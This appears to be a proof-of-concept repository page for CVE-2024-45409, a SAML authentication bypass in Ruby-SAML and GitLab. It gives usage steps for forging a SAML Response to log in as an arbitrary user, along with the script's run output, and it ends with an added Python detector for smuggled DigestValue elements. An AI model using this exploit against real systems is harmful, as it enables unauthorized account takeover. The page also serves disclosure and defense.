
CVE-2024-45409 PoC — The Ruby SAML library vulnerable to a SAML authentication bypass via Incorrect XPath selector

Associated Vulnerability
Title: The Ruby SAML library vulnerable to a SAML authentication bypass via Incorrect XPath selector (CVE-2024-45409)
Description: The Ruby SAML library is for implementing the client side of a SAML authorization. Ruby-SAML in <= 12.2 and 1.13.0 <= 1.16.0 does not properly verify the signature of the SAML Response. An unauthenticated attacker with access to any signed saml document (by the IdP) can thus forge a SAML Response/Assertion with arbitrary contents. This would allow the attacker to log in as arbitrary user within the vulnerable system. This vulnerability is fixed in 1.17.0 and 1.12.3.
Description
Ruby-SAML / GitLab Authentication Bypass (CVE-2024-45409) exploit
Readme
# Ruby-SAML / GitLab Authentication Bypass (CVE-2024-45409) exploit

This script exploits [CVE-2024-45409](https://nvd.nist.gov/vuln/detail/CVE-2024-45409), which allows an unauthenticated attacker holding any signed SAML document issued by the IdP to forge a SAML Response/Assertion and gain access as any user on GitLab.

All the following GitLab (CE/EE) versions are vulnerable:
* < 16.11.10
* 17.0.0 < 17.0.8
* 17.0.0 < 17.1.8
* 17.0.0 < 17.2.7
* 17.0.0 < 17.3.3

This exploit injects the `DigestValue` of the modified assertion into the `StatusDetail` element; because the library's XPath selector is not anchored to the `Signature` being verified, it picks up this smuggled value instead of the one in the `SignedInfo` block.
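As an added, defender-side illustration (not part of this README or the PoC script), the check below uses only Python's standard library to parse a SAML Response and report every `DigestValue` element that does not sit at `ds:Signature/ds:SignedInfo/ds:Reference/ds:DigestValue`. It also contrasts a selection anchored to each `Signature` with a document-wide `//DigestValue`-style lookup, which returns the first match in document order. Both XML documents, the element IDs and the `*_PLACEHOLDER` digest and signature strings are constructed for the example.

```python
"""Added defender-side check for the document shape CVE-2024-45409 abuses.
Not the PoC's code: both SAML Responses below are constructed samples with
placeholder strings in place of real base64 digest and signature values."""
import xml.etree.ElementTree as ET

DS = "http://www.w3.org/2000/09/xmldsig#"

# Constructed: a minimal Response whose only DigestValue sits where a signature
# verifier expects it, inside ds:Signature/ds:SignedInfo/ds:Reference.
BENIGN_RESPONSE = """<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
    xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
    xmlns:ds="http://www.w3.org/2000/09/xmldsig#" ID="_resp1">
  <samlp:Status>
    <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
  </samlp:Status>
  <saml:Assertion ID="_assert1">
    <ds:Signature>
      <ds:SignedInfo>
        <ds:Reference URI="#_assert1">
          <ds:DigestValue>GENUINE_DIGEST_PLACEHOLDER</ds:DigestValue>
        </ds:Reference>
      </ds:SignedInfo>
      <ds:SignatureValue>SIGNATURE_PLACEHOLDER</ds:SignatureValue>
    </ds:Signature>
    <saml:Subject><saml:NameID>alice@example.test</saml:NameID></saml:Subject>
  </saml:Assertion>
</samlp:Response>"""

# Constructed: the same Response with an extra DigestValue placed inside
# samlp:StatusDetail, which precedes the Assertion in document order.
SMUGGLED_RESPONSE = BENIGN_RESPONSE.replace(
    "</samlp:Status>",
    "<samlp:StatusDetail><ds:DigestValue>ATTACKER_DIGEST_PLACEHOLDER"
    "</ds:DigestValue></samlp:StatusDetail></samlp:Status>")


def _local(tag):
    """Strip the {namespace} prefix ElementTree puts on qualified tag names."""
    return tag.rsplit("}", 1)[-1]


def _path(el, parent_of):
    """Build a slash-separated path of local names from the root to el."""
    parts = []
    while el is not None:
        parts.append(_local(el.tag))
        el = parent_of.get(el)
    return "/".join(reversed(parts))


def find_stray_digest_values(xml_text):
    """Return the paths of all DigestValue elements (any namespace) that are not
    a ds:Signature/ds:SignedInfo/ds:Reference child. A verifier that selects
    DigestValue with a document-wide '//' XPath could pick these up."""
    root = ET.fromstring(xml_text)
    parent_of = {child: parent for parent in root.iter() for child in parent}
    stray = []
    for el in root.iter():
        if _local(el.tag) != "DigestValue":
            continue
        ref = parent_of.get(el)
        signed_info = parent_of.get(ref) if ref is not None else None
        signature = parent_of.get(signed_info) if signed_info is not None else None
        well_placed = (
            ref is not None and ref.tag == f"{{{DS}}}Reference"
            and signed_info is not None and signed_info.tag == f"{{{DS}}}SignedInfo"
            and signature is not None and signature.tag == f"{{{DS}}}Signature")
        if not well_placed:
            stray.append(_path(el, parent_of))
    return stray


def anchored_digest_values(xml_text):
    """Correct selection: walk each ds:Signature and read only the DigestValue
    elements under its own SignedInfo/Reference. Unrelated elements are ignored."""
    root = ET.fromstring(xml_text)
    values = []
    for sig in root.iter(f"{{{DS}}}Signature"):
        for dv in sig.findall(f"{{{DS}}}SignedInfo/{{{DS}}}Reference/{{{DS}}}DigestValue"):
            values.append((dv.text or "").strip())
    return values


def document_wide_first_digest(xml_text):
    """Flawed selection for comparison: the first DigestValue anywhere in the
    document, in document order, regardless of which Signature it belongs to."""
    root = ET.fromstring(xml_text)
    first = root.find(f".//{{{DS}}}DigestValue")
    return None if first is None else (first.text or "").strip()


if __name__ == "__main__":
    for name, doc in (("benign", BENIGN_RESPONSE), ("smuggled", SMUGGLED_RESPONSE)):
        print(name, "stray:", find_stray_digest_values(doc))
        print(name, "anchored:", anchored_digest_values(doc))
        print(name, "document-wide first:", document_wide_first_digest(doc))
```

On the constructed smuggled document the anchored selection still returns only the genuine digest, while the document-wide lookup returns the value from `StatusDetail` because `Status` precedes `Assertion`. Either the stray-element report or a mismatch between the two selections is a usable signal for logging or for rejecting a Response before the signature check runs.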

## Requirements

* A valid SAML Response issued by the IDP

## Usage

```bash
apt install python3-lxml
```

Intercept the URL and Base64-encoded IDP SAML response first, then modify the XML content using the script.

```http
POST /users/auth/saml/callback HTTP/1.1
Host: gitlab.test.local
[...]

SAMLResponse=PHNhbWxwOlJlc3Bv[...]
```

```bash
$ python3 CVE-2024-45409.py -r response.url_base64 -n admin@test.local -d -e -o response_patched.url_base64
[+] Parse response
	Digest algorithm: sha256
	Canonicalization Method: http://www.w3.org/2001/10/xml-exc-c14n#
[+] Remove signature from response
[+] Patch assertion ID
[+] Patch assertion NameID
[+] Patch assertion conditions
[+] Move signature in assertion
[+] Patch response ID
[+] Insert malicious reference
[+] Clone signature reference
[+] Create status detail element
[+] Patch digest value
[+] Write patched file in response_patched.url_base64
```

Afterward, replace the `SAMLResponse` parameter value with the script output. If authentication is successful, you will be redirected to the GitLab homepage.

```http
HTTP/1.1 302 Found
Location: http://gitlab.test.local/
[...]

<html><body>You are being <a href="http://gitlab.test.local/">redirected</a>.</body></html>
```

## References
* https://about.gitlab.com/releases/2024/09/17/patch-release-gitlab-17-3-3-released/
* https://github.com/advisories/GHSA-jw9c-mfg7-9rx2
* https://blog.projectdiscovery.io/ruby-saml-gitlab-auth-bypass/
* https://nvd.nist.gov/vuln/detail/CVE-2024-45409
* https://www.cvedetails.com/cve/CVE-2024-45409/
File Snapshot

/data/pocs/eea9123036b91b879134c37c516fde488bead185
├── CVE-2024-45409.py (8.6K)
└── README.md (2.2K)
0 directories, 2 files